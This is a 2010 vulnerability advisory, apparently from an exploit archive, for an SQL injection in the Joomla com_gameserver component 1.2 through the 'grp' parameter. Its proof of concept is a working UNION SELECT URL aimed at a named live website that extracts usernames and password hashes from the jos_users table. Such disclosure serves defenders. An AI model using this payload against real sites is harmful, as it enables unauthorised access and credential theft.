The Joomla Gameserver component 1.2 remote SQL injection

2010-01-23 / 2010-02-12
Credit: B-Hunt3|2
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Joomla (com_gameserver) SQL Injection Vulnerability # Date: 2010-01-22 # Author: B-Hunt3|2 # Software Link: http://joomlacode.org/gf/project/gameserver/frs/ # Version: 1.2 # CVE : N/A [~]>> ...[BEGIN ADVISORY]... !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> TITLE: Joomla (com_gameserver) SQL Injection Vulnerability [~]>> LANGUAGE: PHP [~]>> DORK: N/A [~]>> RESEARCHER: B-HUNT3|2 [~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com [~]>> TESTED ON: Demo Site !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> DESCRIPTION: Input var "grp" is vulnerable to SQL code injection. [~]>> AFFECTED VERSIONS: Confirmed in 1.2 but probably other versions also. [~]>> RISK: High/Medium [~]>> IMPACT: Execute Arbitrary SQL queries !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> PROOF OF CONCEPT: [~]>> http://indianpulse.in/component/gameserver/?view=gameserver&grp=[SQL] [~]>> http://indianpulse.in/component/gameserver/?view=gameserver&grp=-1'+union+all+select+1,concat(username,0x3A,password),3,4,5,6,7+from+jos_users%23 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> ...[END ADVISORY]...


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top